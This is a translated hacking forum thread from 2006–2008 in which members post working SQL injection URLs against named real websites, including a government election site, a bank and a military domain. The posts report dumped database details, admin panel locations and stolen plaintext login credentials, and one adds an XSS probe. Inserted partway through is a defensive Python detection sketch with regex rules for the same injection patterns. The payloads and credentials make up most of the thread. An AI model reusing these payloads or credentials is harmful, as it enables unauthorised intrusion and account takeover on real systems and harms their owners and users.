SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Fugitif

    Code:
    http://www.bsn.org.uk/script.php?id=1%20UNION%20SELECT%201,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8/*
     
  2. tor4)

    http://www.lib.walla.ru/

    http://www.lib.walla.ru/?cat_id=-1+order+by+1,2,3,4,5,6 --
    It doesn't show the version, but it's 5, because it's on the same IP as http://www.antijob.ru/


    OK.
    login: bob
    pass: vova123
    You log in as admin, but the admin panel throws you back to index. Junk)
     
    1 person likes this.
  3. S0ulVortex

    Code:
    http://www.e-light.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    http://www.lavina.dp.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    http://www.angeldent.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    http://vesnabrand.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    Admin panel for all of these sites
    www.as-admin.com/index.php
     
    2 people like this.
  4. $n@ke

    Dbname:TownWWW
    Version:4.0.18-standard
    User:[email protected]

    mysql.user
    sql-server is on the local network ((
     
    3 people like this.
  5. serfertty

    The bug has been fixed, but maybe someone can say why it behaved this way
    Code:
    ttp://www.results.cec.gov.ge//major_olq.php?district=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+table_name+not+in+(char(111)+char(108)+char(113)+char(101)+char(98))))--
    This error was shown

    Code:
    Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near 'char'. (severity 15) in /www/html/shedegebi2008parl/major_olq.php on line 14
    The question is: why?
     
  6. А®ТеS

    Shaitan-Devil, that was because your char functions ended up separated by spaces, like this:
    Code:
    (char(111)+char(108)+char(113)+char(101)  +char(98))
    Because + here is treated as a space, and SQL syntax doesn't understand that. You should have used a construct like this:
    Code:
    char(111,108,113,101,98)
     
  7. serfertty

    Would that construct really work for MSSQL? I thought it was only ANSI standard
     
  8. Kakoytoxaker

    You thought right; you needed to replace + with %2B, that is, like this:
    where+table_name+not+in+(char(111)%2Bchar(108)%2Bchar(113)%2Bchar(101)%2Bchar(98))))--

    And this construct char(111,108,113,101,98) will not work on MSSQL

    And Hex is even better
     
    #6288 Kakoytoxaker, 16 Aug 2008
    Last edited: 16 Aug 2008
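
As an added example (not part of the thread and not any poster's code), a defender-side sketch of the decoding behaviour discussed in posts 6 to 8: form decoding turns `+` into a space and `%2B` into a literal `+`, so a log or WAF rule has to match on the decoded, comment-stripped value rather than on the raw URL. The rule names, paths and sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Inline comments such as /**/ act as whitespace substitutes in SQL.
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# Hypothetical rule set covering constructs named in the thread; extend as needed.
SUSPICIOUS = [
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("information-schema", re.compile(r"\binformation_schema\b", re.I)),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+(\s*,\s*\d+)+", re.I)),
    ("subselect", re.compile(r"\(\s*select\b", re.I)),
    ("char-concat", re.compile(r"\bchar\s*\(\s*\d+\s*\)\s*\+\s*char\s*\(", re.I)),
]

def normalize(value: str) -> str:
    """Collapse SQL comments and whitespace runs in an already URL-decoded value."""
    value = SQL_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip()

def scan_request(target: str):
    """Return (parameter, decoded value, matched rule names) for flagged parameters."""
    findings = []
    # parse_qsl applies form decoding: '+' -> space, '%2B' -> '+', '%20' -> space
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = normalize(raw)
        hits = [rule for rule, rx in SUSPICIOUS if rx.search(decoded)]
        if hits:
            findings.append((name, decoded, hits))
    return findings

# Constructed request lines (hypothetical paths, not taken from any real log)
SAMPLE_REQUESTS = [
    "/news.php?id=42&lang=en",
    "/news.php?id=-1+union+select+1,2,3",
    "/news.php?id=1/**/union/**/select/**/1,2",
    "/list.php?d=1+or+1=(select+char(111)+char(108))",
    "/list.php?d=1+or+1=(select+char(111)%2Bchar(108))",
    "/list.php?cat_id=-1+order+by+1,2,3",
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req, "->", scan_request(req))
```

The fourth and fifth samples differ only in `+` versus `%2B`: the server receives `char(111) char(108)` for the first, which is the syntax error reported in the thread, and `char(111)+char(108)` for the second.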
  9. serfertty

    In that case HEX didn't work, I had already tried it
     
  10. Cennarios

    http://www.sinfonie-hausverwaltung.de/news.php?id=-1+union+select+1,2,3,concat(username,0x3a3a,password),5,6,7,8,9,10,11,12,13,14,16+from+sinfonie_user+limit+1,10/*
    login: ice
    password: xferrari

    http://www.sinfonie-hausverwaltung.de/admin
     
  11. $n@ke

    Some kind of SQL injection, it seems to me... I haven't come across one like this before. Who wants to try working it?)
     
  12. S0ulVortex

    http://www.womennet.ca/directory.php?browse&"><script>alert('S0ulVortex')</script>
    This isn't SQL injection, it's XSS, I think
     
  13. sabe

    Photohost.ru
    Kinomob.info
    Gpb.ge
    5 ver. tables
    /admin

    Photodom.com
    Shadeaux.net
    Hiveprojects.com.au
    Bpjt.net
    S-dir.net.ua
    Tniad.mil.id
     
    #6293 sabe, 16 Aug 2008
    Last edited: 16 Aug 2008
    4 people like this.
  14. FaR-G9

    http://www.krabbelnu.com/categorie.php?cat=99999999+union+select+version()/*

    version(): 5.0.38-Ubuntu_0ubuntu1.4-log
    database(): 22928krabb
    user(): [email protected]

    There are 2 tables in the DB: krabbel_plaatjes and links

    krabbel_plaatjes:
    Code:
       plaatje_id
       plaatje_url
       plaatje_cat
    
    links
    Code:
       id
       titel
       url
       important
       dik
    
     
  15. serfertty

    No, 90% that's not XSS. I've seen this somewhere; IMHO it needs a character-by-character approach.
     
  16. Kakoytoxaker

    http://www.womennet.ca/directory.php?browse&1/**/union/**/select/**/1,version(),3,4,5/*

    PS And in future, please take questions to the neighbouring thread
     
    2 people like this.
  17. SWAT

    Some bank
    http://www.fibank.al/index.php?language=-1/**/union/**/select/**/1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17/*

    Database: website
    User: webmaster@localhost
    Version: 5.0.32-Debian_7etch6-log

     
    2 people like this.
  18. Cennarios

    Some American scientific nonsense...

    http://www.testzentrale.de/?mod=detail&id=1'+union+select+1,concat(0x3a3a,unhex(hex(username)),0x3a3a,unhex(hex(password))),3,4,5,6+from+_verwaltung.tbl_user+limit+1,3/*

    http://www.hogrefe.com/index.php?mod=login
    Login:[email protected] pass:ZeUs
     
  19. Cennarios

    http://www.bueroschnaeppchen.de/shop/seller.php?id=-1+union+select+1,2,3,4,5,6,concat(login,0x3a3a,password),8+from+users+limit+1,10/*

    login: nmb pass: 37f2123f20176519 <- no idea what this is
     
    1 person likes this.
  20. Гаральд

    http://www.autoexotica.ru/news/?nid=130'
     